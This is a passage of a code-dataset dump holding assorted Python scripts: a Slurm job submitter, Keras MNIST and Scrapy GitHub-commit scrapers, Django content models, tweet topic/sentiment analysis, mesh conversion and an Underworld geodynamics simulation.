    # Call Delft3D, using the updated input file. Note that `qsub`\n    # returns immediately with the PBS job id.\n    job_name = 'Delft3D-Dakota' + os.path.splitext(os.getcwd())[1]\n    call(['qsub', '-N', job_name, 'run_delft3d_wave.sh'])\n\n    # Copy in a dummy results file to advance Dakota.\n    shutil.copy(os.path.join(start_dir, fake_file), real_file)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"experiments/delft3d-vector-parameter-study-3/delft3d_run.py","file_name":"delft3d_run.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342106708","text":"import unittest\nfrom HTMLTestRunner import HTMLTestRunner\nsuite = unittest.TestSuite()\ntests = unittest.defaultTestLoader.discover(r\"D:\\Py-workspace\\pythonProject\\银行对象版\",pattern=\"Test*.py\")\nsuite.addTest(tests)\nf = open(file=\"银行测试报告.html\",mode=\"w+\",encoding=\"utf-8\")\nrunner = HTMLTestRunner.HTMLTestRunner(\n    stream = f,\n    title = \"This is a bank test report!\",\n    verbosity= 2,\n    description = \"Ran the bank test cases\"\n)\nrunner.run(suite)","sub_path":"银行单元测试代码/自动测试入口.py","file_name":"自动测试入口.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"51042009","text":"from util import NUM_NODES, read_file, get_initial_state, open_nodes, calc_heuristics\n\n\ndef pathfinding():\n    open_states = []\n\n    initial_state = get_initial_state(nodes)\n    open_states.append(initial_state)\n\n    while len(open_states) > 0:\n        current_state = open_states[0]\n\n        if len(current_state.path) == NUM_NODES:\n            return current_state\n\n        open_states = open_nodes(nodes, current_state, open_states)\n\n        open_states.pop(0)\n        open_states.sort(key=lambda x: (x.distance + x.node.h))\n\n    return None\n\n\nnodes = read_file()\ncalc_heuristics(nodes)\nfinal_state = pathfinding()\n\nprint()\nprint(\"FINAL_PATH:\")\nfor n in final_state.path:\n    print(n.index)\n","sub_path":"a-estrela.py","file_name":"a-estrela.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"416629303","text":"\"\"\" A small Keras feed-forward network for MNIST: four ReLU hidden layers, dropout\nbefore the output layer, and a 10-way softmax output, trained with SGD.\n\n\"\"\"\n\n\nfrom keras.layers import Input, Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom keras.models import Model\nimport keras\n\nfrom load_mnist import load_mnist\nimport numpy as np\nimport math\n\n\ndef main():\n    log_dir = '/tmp/mnist/nn_keras'\n\n    train_data, validate_data, test_data = load_mnist('mnist.pkl.gz')\n\n    # design matrix of shape (num_examples, dim_x); dim_x = 784\n    x_all = train_data[0]\n    num_examples = x_all.shape[0]\n    dim_x = x_all.shape[1]\n    \n    # label matrix (N x 1)\n    c_all = train_data[1]\n    \n    K = 10 # number of classes\n    # target variable (num_examples, K)\n    t_all = keras.utils.to_categorical(c_all)\n    \n    # the same for the test data\n    test_x = test_data[0]\n    test_c = test_data[1]\n    test_t = keras.utils.to_categorical(test_c, K)\n    \n\n    batch_size = 600\n    # learning rate\n    eta = 0.01\n    max_epochs = 1000\n    num_neurons = 30\n\n\n    # the network layers\n    x = Input(shape=(784,))\n    h1 = Dense(num_neurons, activation=keras.activations.relu)(x)\n    h2 = Dense(num_neurons, activation=keras.activations.relu)(h1)\n    h3 = Dense(num_neurons, activation=keras.activations.relu)(h2)\n    h4 = Dense(num_neurons, activation=keras.activations.relu)(h3)\n\n    h4_dropout = Dropout(0.5)(h4)\n\n    y = Dense(10, 
activation=keras.activations.softmax)(h4_dropout)\n\n # Define the model and create the computational graph.\n model = Model(inputs=x, outputs=y)\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=eta),\n metrics=[keras.metrics.categorical_accuracy])\n\n # Train the model.\n model.fit(x_all, t_all,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_data=(test_x, test_t), \n callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=10)])\n\n \n # Evaluate the model\n score = model.evaluate(test_x, test_t, verbose=0)\n\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n\nmain()\n","sub_path":"mnist/nn_5_dropout.py","file_name":"nn_5_dropout.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"225104295","text":"from django.db import models\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\n\nfrom feincms.contrib.richtext import RichTextField\n\nfrom degrees.models import Category, Degree\nfrom quicklinks.models import QuickLinkGroup, QuickLink\nfrom contacts.models import Contact, ContactGroup\n\n\nclass SingleQuickLinkGroupContent(models.Model):\n group = models.ForeignKey(QuickLinkGroup)\n\n class Meta:\n verbose_name = _('Quick Link Group')\n verbose_name_plural = _('Quick Link Groups')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n links = QuickLink.objects.filter(group=self.group)\n\n return render_to_string('quicklinks/singlegroup.html', {\n 'content': self,\n 'links': links,\n })\n\n\nclass SingleContactContent(models.Model):\n title = models.CharField(_('Title'), max_length=100,\n help_text=_('A title for this contact (eg Contact)'),\n blank=True)\n contact = models.ForeignKey(Contact)\n\n class Meta:\n verbose_name = _('Single Contact')\n verbose_name_plural = _('Multiple Contacts')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n return render_to_string('contacts/single.html', {\n 'content': self\n })\n\n\nclass ContactGroupContent(models.Model):\n title = models.CharField(_('Title'), max_length=255,\n help_text=_('The displayed title of this group'))\n group = models.ForeignKey(ContactGroup,\n help_text=_('Specify the group to be displayed'))\n\n class Meta:\n verbose_name = _('Contact Group')\n verbose_name_plural = _('Contact Groups')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n contacts = Contact.objects.filter(group=self.group)\n\n return render_to_string('contacts/group.html', {\n 'content': self,\n 'contacts': contacts,\n })\n\n\nclass IntroContent(models.Model):\n\n BUTTONS = 'buttons'\n LINKS = 'links'\n\n LINK_TYPE_CHOICES = (\n (BUTTONS, _('Buttons'),),\n (LINKS, _('Links'),),\n )\n\n title = models.CharField(_('Title'), max_length=255,\n help_text=_('The title of the intro'))\n subtitle = models.CharField(_('Subtitle'),\n max_length=100,\n help_text=_('A subtitle above the title'),\n blank=True)\n intro = RichTextField(_('Intro'),\n help_text=_('The intro itself'))\n left_link = models.CharField(_('Link'),\n max_length=255,\n help_text=_('A Link that appears underneath the intro, without http://'),\n blank=True)\n left_link_text = models.CharField(_('Link_Text'),\n max_length=100,\n help_text=_('The text that is displayed as a link'),\n blank=True)\n link_type = models.CharField(_('Link_Type'),\n max_length=10,\n 
choices=LINK_TYPE_CHOICES,\n default=BUTTONS,\n help_text=_('''Define wheter the links should be\n displayed as links or buttons.'''))\n links = models.ForeignKey(QuickLinkGroup, blank=True, null=True)\n\n class Meta:\n verbose_name = _('Intro')\n verbose_name_plural = _('Intros')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n links = QuickLink.objects.filter(group=self.links)\n\n return render_to_string('intro/intro.html', {\n 'content': self,\n 'links': links\n })\n\n\nclass CategoryContent(models.Model):\n\n YES = 'teaser'\n NO = 'list'\n\n TEASER_CHOICES = (\n (YES, 'Teaser',),\n (NO, 'Information',),\n )\n\n category = models.ForeignKey(Category,\n verbose_name=_('Category'),\n related_name=_('Teasercontent'))\n teaser = models.CharField(_('Teaser'),\n max_length=10,\n choices=TEASER_CHOICES,\n default=NO,\n help_text=_('Specify wheter this is a teaser or a full list'))\n\n class Meta:\n verbose_name = _('Category Teaser')\n verbose_name_plural = _('Category Teasers')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n degrees = Degree.objects.filter(category=self.category)\n\n template = ''\n if self.teaser == self.NO:\n template = 'list'\n else:\n template = 'teaser'\n\n return render_to_string('degrees/category_' + template + '.html', {\n 'content': self,\n 'degrees': degrees,\n })\n\n\nclass ProxyRowContent(models.Model):\n title = models.CharField(_('Title'), max_length=125,\n help_text=_('The title of this row'))\n text = RichTextField(_('Text'))\n image = models.ImageField(_('Image'),\n upload_to='proxyrow/images',\n help_text=_('The image displayed on the left of the text'))\n download = models.FileField(_('Attachment'),\n help_text=_('A file (PDF) attachment'),\n upload_to='proxyrow/attachments',\n blank=True)\n download_text = models.CharField('Attachment_Text',\n max_length=255,\n help_text=_('The text displayed for the download link.'),\n blank=True)\n link_group = models.ForeignKey(QuickLinkGroup, blank=True,\n help_text=_('Display the links of a link group'),\n null=True)\n\n class Meta:\n verbose_name = _('Proxy Row')\n verbose_name_plural = _('Proxy Rows')\n abstract = True\n\n def render(self, request, *args, **kwargs):\n\n links = QuickLink.objects.filter(group=self.link_group)\n\n return render_to_string('proxyrow/row.html', {\n 'content': self,\n 'links': links,\n })\n","sub_path":"unili/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"396839754","text":"import scrapy\n\nf = open('haha.txt', \"w\")\n\n# 'https://github.com/jquery/jquery/commits/master',\n# 'https://github.com/codeschool-projects/HelloCodeSchoolProject/commits/master'\n\nclass DummySpider(scrapy.Spider):\n name = \"dummy\"\n start_urls = [\n 'https://github.com/codeschool-projects/HelloCodeSchoolProject/commits/master'\n ]\n download_delay = 0.05\n\n\n\n def doit(self, response):\n arr = response.xpath('//tr//span/text()').extract()\n string = \"\"\n for stri in arr:\n string += stri\n yield {\n 'insider': string,\n }\n\n def parse(self, response):\n for listitem in response.xpath('//li[@class=\"commit commits-list-item js-commits-list-item table-list-item js-navigation-item js-details-container Details js-socket-channel js-updatable-content\"]'):\n rel_url = listitem.xpath('div/div/a/@href').extract_first()\n complete_url = response.urljoin(rel_url)\n yield {\n 'RevisionId': complete_url,\n 'TimeStamp': 
listitem.xpath('div/div/div/relative-time/@datetime').extract_first(),\n 'Contributors': listitem.xpath('div/div/div/a/text()').extract_first(),\n 'EditDetails': listitem.xpath('div/p/a/text()').extract_first(),\n }\n f.write(complete_url + '\\n')\n #response.follow(rel_url, self.doit)\n\n next_page = response.xpath('//div/div/div/div/div/div/div/a/@href')[-1].extract()\n if next_page is not None:\n yield response.follow(next_page, self.parse)\n","sub_path":"Github-Spider/dummy_spider1.py","file_name":"dummy_spider1.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334876221","text":"import pandas as pd\nimport numpy as np\nimport os\n\n# TODO: use .txt file instead of .csv file?\n\n\n# convert dictionay to cmd args in the form \"--key value\"\ndef dict_to_cmd_args(d):\n s = []\n for key, value in d.items():\n s.append(\"--\"+key+\" \"+str(value))\n return \" \".join(s)\n\n\ndef read_job_id_from_job_name(job_name):\n # find slurm job id based on given job name and read it\n job_id = os.popen('squeue --noheader --format %i --name {}'\n .format(job_name)).read()\n # since they are all array jobs, only take the job id not the array id\n dependency_job_id = job_id.split(\"_\")[0]\n return dependency_job_id\n\n\ndef main():\n # create jobs file text in this script from which a temporary file will\n # be created\n job_file = (\n \"#!/bin/bash\\n\"\n \"# redirect the output/error to some files\\n\"\n \"#SBATCH -o /home/fiederer/out/%A-%a.o\\n\"\n \"#SBATCH -e /home/fiederer/error/%A-%a.e\\n\"\n # \"export PYTHONPATH={}\\n\"\n \"{}\\n\"\n \"{}\\n\"\n \"python {} {}\\n\")\n\n configs_file = \"/home/fiederer/nicebot/metasbat_files/configs.csv\"\n # load all the configs to be run\n configs_df = pd.DataFrame.from_csv(configs_file).T\n\n # specify python path, virtual env and python script to be run\n # python_path = '/home/fiederer/nicebot'\n source_call = 'source /home/fiederer/.bashrc'\n virtual_env = 'conda activate braindecode'\n python_file = ('/home/fiederer/nicebot/deepRegressionCode/DeepRegression_kisbat.py')\n # python_file = ('/home/fiederer/nicebot/deepRegressionCode/DeepRegression_acrossSubjects_kisbat.py')\n # python_file = ('/home/fiederer/nicebot/deepRegressionCode/DeepRegression_withinSubjects_kisbat.py')\n\n # specify temporary job file and command to submit\n # schedule to different hosts. 
only one job per host\n    # hosts = [\"metagpua\", \"metagpub\", \"metagpuc\", \"metagpud\", \"metagpue\"]\n    # queue = \"ml_gpu-rtx2080\"\n    script_name = \"/home/fiederer/jobs/slurm/run_tmp.sh\"\n    # batch_submit = \"sbatch -p queue -w host -c num_workers --array={}-{} --job-name=b_{}_j_{} {} {}\"\n\n    # sbatch -p meta_gpu-ti -w metagpub -c 4 jobs/slurmbjob.pbs\n\n    # loop through all the configs\n    for setting in configs_df:\n        model_name = configs_df[setting]['model_name']\n        if any([model_name == a for a in ['lin_reg', 'lin_svr', 'rbf_svr', 'rf_reg']]):\n            # Specify queue\n            # queue = \"ml_gpu-rtx2080\"\n            # queue = 'ml_cpu-ivy'\n            queue = 'cpu_ivy'\n            if model_name == 'rf_reg':\n                batch_submit = \"sbatch -p {queue} -c 16 {script_name}\"\n            else:\n                batch_submit = \"sbatch -p {queue} -c 1 {script_name}\"\n                # batch_submit = \"sbatch -p {queue} -c 1 --gres=gpu:0 {script_name}\"\n        elif any([model_name == a for a in ['eegnet', 'deep4', 'resnet']]):\n            # queue = \"meta_gpu-black\"\n            # queue = \"ml_gpu-rtx2080\"\n            # queue = \"meta_gpu-ti\"\n            # queue = \"meta_gpu-x\"\n            queue = ['meta_gpu-black', 'meta_gpu-x', 'meta_gpu-ti', 'ml_gpu-rtx2080'][np.random.randint(1, 3)] # 0, 4\n            batch_submit = \"sbatch -p {queue} -c 2 --gres=gpu:1 {script_name}\"\n        else:\n            print('Cannot define queue for model {:s}'.format(model_name))\n\n        # configs_df[setting]['result_folder'] = '/data/schirrmr/fiederer/nicebot/results'\n        config = configs_df[setting].to_dict()\n        # create a tmp job file / job for every config\n        cmd_args = dict_to_cmd_args(config)\n        curr_job_file = job_file.format(source_call,\n                                        virtual_env,\n                                        python_file, cmd_args)\n\n        # write tmp job file and submit it to slurm\n        with open(script_name, \"w\") as f:\n            f.writelines(curr_job_file)\n\n        # print(batch_submit.format(queue=queue, script_name=script_name))\n        os.system(batch_submit.format(queue=queue, script_name=script_name))\n\n\nif __name__ == '__main__':\n    # TODO: add arg parse\n    main()\n","sub_path":"metasbat_files/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515823012","text":"import math\nimport trimesh\nimport argparse\nimport numpy as np\nfrom pathlib import Path\nimport ipdb\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description='Process some integers.')\n    parser.add_argument('-f', '--file', metavar='N', type=str, help='Obj File')\n    args = parser.parse_args()\n    return args\n\ndef save_as_glb(obj_file_path, mesh, gltf=False):\n    p = Path(obj_file_path)\n    suffix = '.gltf' if gltf else '.glb'\n    p = p.with_suffix(suffix)\n    mesh.export(str(p))\n\ndef get_rotatation_matrix(origin):\n    radius = np.linalg.norm(origin)\n    lat = np.arcsin(origin[2] / radius)\n    lon = np.arctan2(origin[1], origin[0])\n\n    sin_lat = np.sin(lat)\n    cos_lat = np.cos(lat)\n    sin_lon = np.sin(lon)\n    cos_lon = np.cos(lon)\n\n    Rz = np.array([[cos_lon, sin_lon, 0, 0], [-sin_lon, cos_lon, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])\n    Ry = np.array([[cos_lat, 0, sin_lat, 0], [0, 1, 0, 0], [-sin_lat, 0, cos_lat, 0], [0, 0, 0, 1]])\n\n    sin_90 = np.sin(-math.radians(90))\n    cos_90 = np.cos(-math.radians(90))\n    Rf = np.array([[cos_90, sin_90, 0, 0], [-sin_90, cos_90, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]])\n    # print(lat, math.degrees(lat), lon, math.degrees(lon) )\n    # Rz = np.eye(4)\n    # Ry = np.eye(4)\n    R = Rf @ Ry @ Rz\n\n    return R\n\ndef get_mesh_mean(mesh_obj):\n    return np.mean(np.mean(mesh_obj.triangles,axis=0), axis=0)\n\ndef translate_scene(mesh, mesh_min):\n    for key, 
geom in mesh.geometry.items():\n geom.apply_translation(-mesh_mean)\n\ndef rotate_scene(mesh, rotation_matrix):\n for key, geom in mesh.geometry.items():\n geom.apply_transform(rotation_matrix)\n\ndef scale_obj(obj_file_path):\n mesh = trimesh.load_mesh(obj_file_path)\n mesh_mean = get_mesh_mean(mesh)\n rot_matrix = get_rotation_matrix(mesh_mean)\n print(\"Mean Value of Mesh: \", mesh_mean)\n translate_scene(mesh, mesh_mean)\n rotate_scene(mesh, rot_matrix)\n # mesh.show()\n save_as_glb(obj_file_path, mesh)\n\n\ndef main():\n args = parse_args()\n scale_obj(args.file)\n # convert_obj_to_glb(args.file)\n\nif __name__ == \"__main__\":\n main()","sub_path":"reversegoogle/obj_to_glb.py","file_name":"obj_to_glb.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"498690762","text":"import nltk\nimport numpy as np\nfrom nltk import sent_tokenize, word_tokenize, pos_tag\nimport matplotlib.pyplot as plt\nfrom pylab import *\nfrom bs4 import BeautifulSoup\nfrom nltk.stem import WordNetLemmatizer\nimport re\nimport pandas as pd\n\nimport tweepy\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\n \nconsumer_key = '12345'\nconsumer_secret = '12345'\naccess_token = '123-12345'\naccess_secret = '12345'\n \nauth = OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n \napi = tweepy.API(auth)\n\nnumber_tweets=100\ndata=[]\nfor status in tweepy.Cursor(api.search,q=\"trump\").items(number_tweets):\n try:\n URLless_string = re.sub(r'\\w+:\\/{2}[\\d\\w-]+(\\.[\\d\\w-]+)*(?:(?:\\/[^\\s/]*))*', '', status.text)\n data.append(URLless_string)\n except:\n pass\n\nlemmatizer = WordNetLemmatizer()\n\ntext=data\n\nsentences = sent_tokenize(str(text))\nsentences2=sentences\nsentences2\n\ntokens = word_tokenize(str(text))\ntokens=[lemmatizer.lemmatize(tokens[i]) for i in range(0,len(tokens))]\n\nlen(tokens)\n\ntagged_tokens = pos_tag(tokens)\ntagged_tokens\n\n## NOUNS\ntext2 = word_tokenize(str(text))\nis_noun = lambda pos: pos[:2] == 'NN'\nb=nltk.pos_tag(text2)\nb\nnouns = [word for (word, pos) in nltk.pos_tag(text2) if is_noun(pos)] \nnouns\nV = set(nouns)\nlong_words1 = [w for w in tokens if 4 < len(w)]\n\n# Standard gensim-tutorial preprocessing (assumed here: the raw tweets in data serve as the documents).\ndocuments = data\nstoplist = set('for a of the and to in'.split())\ntexts = [[word for word in document.lower().split() if word not in stoplist]\n for document in documents]\n\n# keep only tokens that appear more than once\nfrom collections import defaultdict\nfrequency = defaultdict(int)\nfor text in texts:\n for token in text:\n frequency[token] += 1\ntexts = [[token for token in text if frequency[token] > 1]\n for text in texts]\nfrom pprint import pprint # pretty-printer\npprint(texts)\n\nfrom gensim import corpora\ndictionary = corpora.Dictionary(texts)\ndictionary.save('/tmp/deerwester4.dict')\n\nprint(dictionary.token2id)\n\n\n## SENTENCE VECTORS\ncorpus = [dictionary.doc2bow(text) for text in texts]\ncorpora.MmCorpus.serialize('/tmp/deerwester4.mm', corpus) # store to disk, for later use\nprint(corpus)\n\nfrom gensim import corpora, models, similarities\ntfidf = models.TfidfModel(corpus) # step 1 -- initialize a model\n\n\ncorpus_tfidf = tfidf[corpus]\nfor doc in corpus_tfidf:\n print(doc)\n\nlsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=2)\ncorpus_lsi = lsi[corpus_tfidf] # create a double wrapper over the original corpus: bow->tfidf->fold-in-lsi\n\nlsi.print_topics(2)\n\n## TEXT COORDINATES\ntodas=[]\nfor doc in corpus_lsi: # both bow->tfidf and tfidf->lsi transformations are actually executed here, on the fly\n todas.append(doc)\ntodas\n\nfrom gensim import corpora, models, similarities\ndictionary = corpora.Dictionary.load('/tmp/deerwester4.dict')\ncorpus = corpora.MmCorpus('/tmp/deerwester4.mm') # 
comes from the first tutorial, \"From strings to vectors\"\nprint(corpus)\n\nnp.array(corpus).shape\n\nlsi = models.LsiModel(corpus, id2word=dictionary, num_topics=2)\n\n\np=[]\nfor i in range(0,len(documents)):\n doc1 = documents[i]\n vec_bow2 = dictionary.doc2bow(doc1.lower().split())\n vec_lsi2 = lsi[vec_bow2] # convert the query to LSI space\n p.append(vec_lsi2)\n \np\n \nindex = similarities.MatrixSimilarity(lsi[corpus]) # transform corpus to LSI space and index it\n\nindex.save('/tmp/deerwester4.index')\nindex = similarities.MatrixSimilarity.load('/tmp/deerwester4.index')\n\n#################\n\nimport gensim\nimport numpy as np\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\nimport matplotlib as mpl\n\nmatrix1 = gensim.matutils.corpus2dense(p, num_terms=4)\nmatrix3=matrix1.T\nmatrix3\n\nfrom sklearn import manifold, datasets, decomposition, ensemble, discriminant_analysis, random_projection\n\ndef norm(x):\n return (x-np.min(x))/(np.max(x)-np.min(x))\n\nX=norm(matrix3)\n\ntsne = manifold.TSNE(n_components=2, init='pca', random_state=0,perplexity=50,verbose=1,n_iter=1500)\nX_tsne = tsne.fit_transform(X)\n\n### WORK HERE - HOW DID I FIND OUT THERE WERE 3 CLUSTERS ???? SORT X_tsne\n## DEFINE K-MEANS\nplt.hist(X_tsne)\n\nfrom sklearn.cluster import KMeans\nmodel3=KMeans(n_clusters=4,random_state=0)\nmodel3.fit(X_tsne)\ncc=model3.predict(X_tsne)\n\n## ALSO TRY WITH X TO SEE WHICH TOPIC IT SELECTS\n\ntokens2 = word_tokenize(str(sentences2))\ntokens2\n\ntokens2=[lemmatizer.lemmatize(tokens2[i]) for i in range(0,len(tokens2))]\n\nlong_words12 = [w for w in tokens2 if len(w) > 5]\nsorted(long_words12)\nfdist012 = nltk.FreqDist(long_words12)\na12=fdist012.most_common(5)\n\nfrom matplotlib.colors import LinearSegmentedColormap\n\nprint('TOPIC 1\\n')\n\nprint(a12,'\\n')\n\nfor i in np.where(cc==2)[0][2:10]:\n print(i,sentences2[i])\n\nn_classes=4\ncolors = [(1, 0, 0), (0, 1, 0), (0, 0, 1),(0,0,0)] \ncm = LinearSegmentedColormap.from_list(\n 'topics', colors, N=4)\ncor=[colors[cc[i]] for i in range(0,len(cc))]\n\nh=[]\nlabel=[]\nfig = plt.figure(figsize=(8,4))\nplt.title('NATURAL LANGUAGE PROCESSING\\n\\n'+'TOPIC MODELING at TWITTER HASHTAG: '+'#trump',fontweight=\"bold\")\nfor i in range(0,4):\n label.append('Topic {}'.format([0,1,2,3][i]))\n plt.scatter(X_tsne[:, 0], X_tsne[:, 1],c=cc,cmap=cm,marker='o',s=100)\n h1,=plt.plot(1,1,color=colors[i],linewidth=3)\n h.append(h1)\nplt.legend(h,label,loc=\"upper left\")\nplt.show()\nmodel = models.LdaModel(corpus, id2word=dictionary, num_topics=4)\nmodel.print_topics(4)\n\n### ACCUMULATE FEELINGS\n\nfrom nltk.sentiment import SentimentAnalyzer\nfrom nltk.sentiment.util import *\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer as sia\nsentim=sia()\n\ncc0=[]\nfor sentence in documents:\n cc0.append(sentim.polarity_scores(sentence))\n\nneu=[]\nneg=[]\nfor sentence in documents:\n ss = sentim.polarity_scores(sentence)\n for k in sorted(ss):\n print('{0}: {1}, '.format(k, ss[k]), end='')\n neg.append(ss[k])\n neu.append(k)\n print()\n print('\\n')\n\nf=int(len(neg)/4)\nsent0=np.array(neu).reshape(f,4)\nsent=np.array(neg).reshape(f,4)\ncomp=sent.T[0]\n\n\npositivos=len(np.where(np.array(comp)>0)[0])\nneutros=len(np.where(np.array(comp)==0)[0])\nnegativos=len(np.where(np.array(comp)<0)[0])\n\nfrom matplotlib import style\nprint(plt.style.available)\n\nstyle.use(\"seaborn-darkgrid\")\n\nx = np.arange(0, len(comp), 
1)\nplt.figure(figsize=(9,6))\nplt.plot(np.cumsum(comp),linewidth=3,color='blue')\nplt.fill_between(x,np.cumsum(comp),0,where=np.cumsum(comp)<0,facecolor='red',alpha=.7)\nplt.fill_between(x,np.cumsum(comp),0,where=np.cumsum(comp)>0,facecolor='lawngreen',alpha=.7)\nplt.annotate('POSITIVE',(140,1.5),fontweight='bold')\nplt.annotate('NEGATIVE',(140,-3),fontweight='bold')\nplt.title('Natural Language Processing\\n'+'\\n'+'Mood in Twitter Streaming #trump Feb 23, 2017 - 5 Minutes',fontweight='bold')\nplt.show()\n","sub_path":"examples/rubens/nlp_twitter_streaming_mood.py","file_name":"nlp_twitter_streaming_mood.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"323120814","text":"from examples.linear_regression_experiment.mnist_data.miracle import MnistMiracle\nimport os\nNO_KL_ITERATIONS = 2000\nKL_ITERATIONS = 80000\nRETRAIN_ITERATIONS = 3000\n\nBITS_PER_BLOCK = 10\nBLOCK_SIZE = 15\nHASH_GROUP_SIZE = 1\nOUT_DIR = 'out/compressed'\nOUT_FILE = 'trainp_bits{}_block{}_hash{}.mrcl'.format(BITS_PER_BLOCK, BLOCK_SIZE, HASH_GROUP_SIZE)\n\nmm = MnistMiracle(bits_per_block=BITS_PER_BLOCK, block_size_vars=BLOCK_SIZE, hash_group_size_vars=HASH_GROUP_SIZE,\n out_dir=OUT_DIR)\n\n# mm.pretrain(NO_KL_ITERATIONS)\n# mm.train(KL_ITERATIONS)\n#\n# mm.compress(RETRAIN_ITERATIONS, OUT_FILE)\n\nmm.load_model(os.path.join(OUT_DIR, OUT_FILE))\nmm.test(kl_loss=False)","sub_path":"examples/linear_regression_experiment/mnist_data/run_miracle.py","file_name":"run_miracle.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"234782529","text":"import os\nos.environ[\"UW_ENABLE_TIMING\"] = \"1\"\nimport underworld as uw\nfrom underworld import function as fn\nimport glucifer\nimport math\nimport numpy as np\nimport time\ntime_post_import = time.time()\ntime_launch_srun = float(os.environ[\"TIME_LAUNCH_SRUN\"])/1000.\ntime_launch_python = float(os.environ[\"TIME_LAUNCH_PYTHON\"])/1000.\nuw.timing.start()\n\nif os.environ[\"UW_ENABLE_IO\"] == \"1\":\n do_IO=True\nelse:\n do_IO=False\n\nother_timing = {}\nother_timing[\"Python_Import_Time\"] = time_post_import - time_launch_python\nother_timing[\"Container_Launch_Time\"] = time_launch_python - time_launch_srun\n\nres = 64\nRESKEY = \"UW_RESOLUTION\"\nif RESKEY in os.environ:\n res = int(os.environ[RESKEY])\n\nPREFIX = os.environ[\"PREFIXSTRING\"]\n\nmesh = uw.mesh.FeMesh_Cartesian(elementRes = (res, res, res),\n minCoord = ( 0., 0., 0., ),\n maxCoord = ( 1., 1., 1., ))\n\nvelocityField = uw.mesh.MeshVariable( mesh=mesh, nodeDofCount=3 )\npressureField = uw.mesh.MeshVariable( mesh=mesh.subMesh, nodeDofCount=1 )\ntemperatureField = uw.mesh.MeshVariable( mesh=mesh, nodeDofCount=1 )\ntemperatureFieldDeriv = uw.mesh.MeshVariable( mesh=mesh, nodeDofCount=1 )\n\n# initialise \nvelocityField.data[:] = [0.,0.,0.]\npressureField.data[:] = 0.\n\nfor index, coord in enumerate(mesh.data):\n temperatureField.data[index] = coord[2]\n\ntemperatureFieldDeriv.data[:] = 0.\n\n\n# Create a swarm.\nswarm = uw.swarm.Swarm( mesh=mesh )\n\n# Create a data variable. 
It will be used to store the material index of each particle.\nmaterialIndex = swarm.add_variable( dataType=\"int\", count=1 )\n\n# Create a layout object, populate the swarm with particles.\nswarmLayout = uw.swarm.layouts.PerCellSpaceFillerLayout( swarm=swarm, particlesPerCell=40 )\nswarm.populate_using_layout( layout=swarmLayout )\n\n\n\n# define these for convenience. \ndenseIndex = 0\nlightIndex = 1\n\n# material perturbation from van Keken et al. 1997\nwavelength = 2.0\namplitude = 0.02\noffset = 0.2\nk = 2. * math.pi / wavelength\n\n# Create function to return particle's coordinate\ncoord = fn.coord()\n\n# Define the material perturbation, a function of the x coordinate (accessed by `coord[0]`).\nperturbationFn = offset + amplitude*fn.math.cos( k*coord[0] )\n\n# Setup the conditions list. \n# If the y coordinate is less than the perturbation, set to lightIndex.\nconditions = [ ( perturbationFn > coord[1] , lightIndex ),\n ( True , denseIndex ) ]\n\n# The swarm is passed as an argument to the evaluation, providing evaluation on each particle.\n# Results are written to the materialIndex swarm variable.\nfnc = fn.branching.conditional( conditions )\nmatdat = fnc.evaluate(swarm)\nmaterialIndex.data[:] = matdat\n\nstore = glucifer.Store('{}_RT'.format(PREFIX),compress=False)\n\nfig = glucifer.Figure( store, name=\"firstFig\" )\nfig.append( glucifer.objects.Points(swarm, materialIndex, pointSize=2, colourBar=False) )\nfig.append( glucifer.objects.Surface(mesh, pressureField))\nfig.append( glucifer.objects.VectorArrows( mesh, velocityField, scaling=1.0e2))\n\n\n# Set a density of '0.' for light material, '1.' for dense material.\ndensityMap = { lightIndex:0., denseIndex:1. }\ndensityFn = fn.branching.map( fn_key = materialIndex, mapping = densityMap )\n\n# Set a viscosity value of '1.' for both materials.\nviscosityMap = { lightIndex:1., denseIndex:1. }\nfn_viscosity = fn.branching.map( fn_key = materialIndex, mapping = viscosityMap )\n\n# Define a vertical unit vector using a python tuple.\nz_hat = ( 0., 0., 1. 
